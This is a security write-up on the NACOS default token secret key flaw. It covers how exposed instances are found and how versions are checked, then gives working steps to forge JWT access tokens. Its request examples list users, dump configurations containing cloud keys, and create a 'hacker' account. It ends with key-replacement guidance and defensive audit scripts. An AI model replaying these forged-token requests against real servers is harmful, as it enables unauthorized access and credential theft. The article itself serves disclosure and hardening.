Understanding NACOS Security Vulnerabilities and Best Practices for Configuring Authentication


1. Principle of NACOS

NACOS[1], /nɑ:kəʊs/, is a dynamic service discovery, configuration management, and service management platform that is easier for building cloud-native applications.

In versions <=2.2.0 and <=1.4.4, the NACOS configuration file conf/application.properties contains a default key nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789.


This key is the secret used to sign the access token that NACOS issues on user login. The token is a JWT[2] (JSON Web Token).

An attacker who knows the default key and guesses a commonly used account name can generate a valid access token, thereby bypassing authentication and gaining direct access to NACOS.

2. Impact of NACOS

Once the attacker gains access to NACOS, they can view every configuration file it manages and search them for credentials, such as a cloud provider's AccessKey/SecretKey (AKSK) pair or a Java application's JDBC connection string, thereby obtaining access to the corresponding services.

3. NACOS Attack

3.1. Asset Discovery with NACOS

Search for Assets

FOFA[3]: app="NACOS"

View Version

# Request URL

/nacos/v1/console/server/state

# Response Example

{"version":"2.2.0","standalone_mode":"standalone","function_mode":null}
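The version returned by the state endpoint decides whether an instance falls into the affected range stated above (2.x up to 2.2.0, 1.x up to 1.4.4). The following is an added example for asset owners checking their own inventory; it is not code from the page or from the Nacos project. The only input it needs is the JSON body shown above, which is embedded as a sample; the version boundaries are the ones the text gives, and anything outside the 1.x and 2.x lines is reported as unknown rather than guessed.

```python
import json
import re

# Response body of /nacos/v1/console/server/state as shown on the page.
SAMPLE_STATE = '{"version":"2.2.0","standalone_mode":"standalone","function_mode":null}'

# Highest release per major line that still ships the default token key,
# as stated in the text (<=2.2.0 and <=1.4.4).
LAST_AFFECTED = {1: (1, 4, 4), 2: (2, 2, 0)}


def parse_version(version):
    """Turn '2.2.0', '2.2.0.1' or '1.4.4-BETA' into a comparable tuple of ints."""
    parts = re.findall(r"\d+", version)
    if not parts:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(p) for p in parts)


def is_default_key_era(version):
    """True if the version is within the affected range, False if newer,
    None if the major line is not covered by the page's statement."""
    v = parse_version(version)
    bound = LAST_AFFECTED.get(v[0])
    if bound is None:
        return None
    # Tuple comparison: (2, 2, 0, 1) > (2, 2, 0), so patch releases after
    # the boundary are treated as fixed.
    return v <= bound


def assess_state(body):
    """Parse the state endpoint JSON and classify the instance."""
    state = json.loads(body)
    version = state.get("version")
    if not version:
        return {"version": None, "affected": None, "standalone_mode": state.get("standalone_mode")}
    return {
        "version": version,
        "affected": is_default_key_era(version),
        "standalone_mode": state.get("standalone_mode"),
    }


if __name__ == "__main__":
    result = assess_state(SAMPLE_STATE)
    print(f"version {result['version']}: affected={result['affected']}")
```

Feed it the state response of each instance you operate; an `affected` result of `True` means the default key must be replaced (section 4) even if the instance has authentication enabled.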

3.2. Exploit

Deploy Service

1. Download Link: 2.2.0 (Dec 14, 2022)[4], 1.4.4 (Aug 8th, 2022)[5]

2. Enable Authentication: Set nacos.core.auth.enabled=true in the configuration file conf/application.properties.


3.1. Deploy on Linux: Configure the environment variable with export JAVA_HOME=/usr/lib/jvm/java-17-openjdk-amd64, start the service with bash bin/startup.sh -m standalone, and stop it with bash bin/shutdown.sh.

3.2. Deploy on Windows: Configure the environment variable under This PC - Properties - Advanced system settings - Advanced - Environment Variables as JAVA_HOME=C:\Program Files\Java\jdk1.8.0_361, start the service with bin\startup.cmd -m standalone, and stop it with bin\shutdown.cmd.

Generate accessToken

Generation site: JWT website[6]

Key Parameters:

1. Common Accounts: e.g., nacos, nac0s, nacosss, nacos1, admin

2. Default Key: SecretKey012345678901234567890123456789012345678901234567890123456789

Other Parameters:

3. Signature Algorithm: HS256 (HMAC SHA256, default for JWT)

4. Expiry Time: Use command in Linux date +%s -d '2024-03-10 00:00:00' to generate expiry time

5. Enable Base64 Encoding: Yes (recommended by NACOS)

View Accounts: Often used in penetration testing or vulnerability scanning to verify the existence of vulnerabilities.

# Request URL (GET)

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDAwMDAwMH0.l5OewNgzUxgyFdy7aAQBNfst7FOZ9bE9cHoLd9dMX74&pageNo=1&pageSize=9&search=accurate

# Response Example

{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}

View Configurations: Often used in red team engagements to search for account passwords and gain more permissions.

# Request URL (GET)

/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDAwMDAwMH0.l5OewNgzUxgyFdy7aAQBNfst7FOZ9bE9cHoLd9dMX74

# Response Example

{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"id":"740458855550423040","dataId":"aliyun.yaml","group":"DEFAULT_GROUP","content":"aliyun:\n    access-key-id: RzRRFE5tQqsxAieELkMDLTAI\n    access-key-secret: 52dW2iDdPzmddUBEDlKHej5uYddK89","md5":null,"encryptedDataKey":null,"tenant":"","appName":"","type":"yaml"}]}

Create Account, Log into Backend, View Configurations: Similar to red team scenarios.

# Request URL (POST)

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwOTk5MTEwOX0.h2WWx4rr9_pxbYzRe2Psrw5JDY3mKzXiUK-FhMKCkto&username=hacker&password=123456

# Response Example

{"code":200,"message":null,"data":"create user ok!"}

4. Defense

Generating an access token requires two key parameters: a user account and the secret key. Replacing the default key with a private one prevents attackers from forging access tokens and closes this vulnerability.

The content below is based on the custom key section of the Nacos Documentation[7] and on the Nacos announcement explaining the risk of the default token.secret.key and server.identity values and how to resolve it[8].

Location to Modify Default Key

Configuration file: conf/application.properties

Default key:

### The default token(Base64 String):

nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

### After version 2.1.0    

nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

Considerations for Modifying Default Key

1. The original key length must not be less than 32 characters. It is recommended to Base64 encode the original key, for example:

### Original key (exactly 32 characters)

ThisIsMyCustomSecretKey012345678

### The default token(Base64 String):

nacos.core.auth.default.token.secret.key=VGhpc0lzTXlDdXN0b21TZWNyZXRLZXkwMTIzNDU2Nzg=

### After version 2.1.0

nacos.core.auth.plugin.nacos.token.secret.key=VGhpc0lzTXlDdXN0b21TZWNyZXRLZXkwMTIzNDU2Nzg=

2. The authentication switch takes effect immediately after being modified, and no server restart is needed.

3. When changing token.secret.key on a running server, make sure the new value is valid: an invalid value makes all subsequent logins fail and causes access errors.

4. The key must be identical on every node of a cluster; if the nodes disagree for long, requests fail with a 403 invalid token error.
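The considerations above can be turned into a configuration check, so that a deployment is never left on the default key or on a key that is too short. The following is an added example, not code from the page or from the Nacos project. It parses a conf/application.properties file (a constructed sample is embedded), flags the default key string quoted on this page, verifies that a custom key is Base64 and decodes to at least 32 bytes, and generates a fresh random key in the required form. The strict Base64 check is this script's own conservative rule following the page's recommendation to Base64-encode the key; the property names and the default value are exactly those shown on the page.

```python
import base64
import binascii
import secrets

# Default key quoted on the page; any deployment still using it is exposed.
DEFAULT_KEY = "SecretKey012345678901234567890123456789012345678901234567890123456789"

# Both property names from the page (pre-2.1.0 and post-2.1.0 spelling).
KEY_PROPERTIES = (
    "nacos.core.auth.default.token.secret.key",
    "nacos.core.auth.plugin.nacos.token.secret.key",
)

# HS256 needs a key of at least 256 bits; the page requires an original key
# of no fewer than 32 characters before Base64 encoding.
MIN_KEY_BYTES = 32

# Constructed sample of a weak conf/application.properties (not a real deployment).
SAMPLE_WEAK = """\
### constructed sample
nacos.core.auth.enabled=false
### The default token(Base64 String):
nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
### After version 2.1.0
nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
"""


def parse_properties(text):
    """Minimal .properties parser: key=value lines, '#'/'!' comments ignored."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            props[key.strip()] = value.strip()
    return props


def check_secret_key(value):
    """Return a list of findings for one token.secret.key value (empty means OK)."""
    if value == DEFAULT_KEY:
        return ["default key in use: access tokens can be forged by anyone"]
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return ["value is not valid Base64; encode the original key before setting it"]
    if len(raw) < MIN_KEY_BYTES:
        return [f"decoded key is {len(raw)} bytes; need at least {MIN_KEY_BYTES}"]
    return []


def audit(text):
    """Audit a properties file; returns {property: [findings]} (empty dict means OK)."""
    props = parse_properties(text)
    findings = {}
    if props.get("nacos.core.auth.enabled", "false").lower() != "true":
        findings["nacos.core.auth.enabled"] = ["authentication is not enabled"]
    for prop in KEY_PROPERTIES:
        if prop in props:
            problems = check_secret_key(props[prop])
            if problems:
                findings[prop] = problems
    return findings


def encode_key(original):
    """Base64-encode an original key string, as the page recommends."""
    return base64.b64encode(original.encode("utf-8")).decode("ascii")


def generate_key(nbytes=32):
    """Produce a random key of nbytes and return it Base64-encoded, ready for the properties file."""
    return base64.b64encode(secrets.token_bytes(nbytes)).decode("ascii")


if __name__ == "__main__":
    for prop, problems in audit(SAMPLE_WEAK).items():
        print(f"{prop}: {'; '.join(problems)}")
    print("replacement key:", generate_key())
```

The audit is meant to run against every node's conf/application.properties, which also covers consideration 4: comparing the key values returned by parse_properties across nodes shows whether they are consistent. Note that a 32-character original key pasted without Base64 encoding is itself valid Base64 and decodes to only 24 bytes, so the length check catches that mistake.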
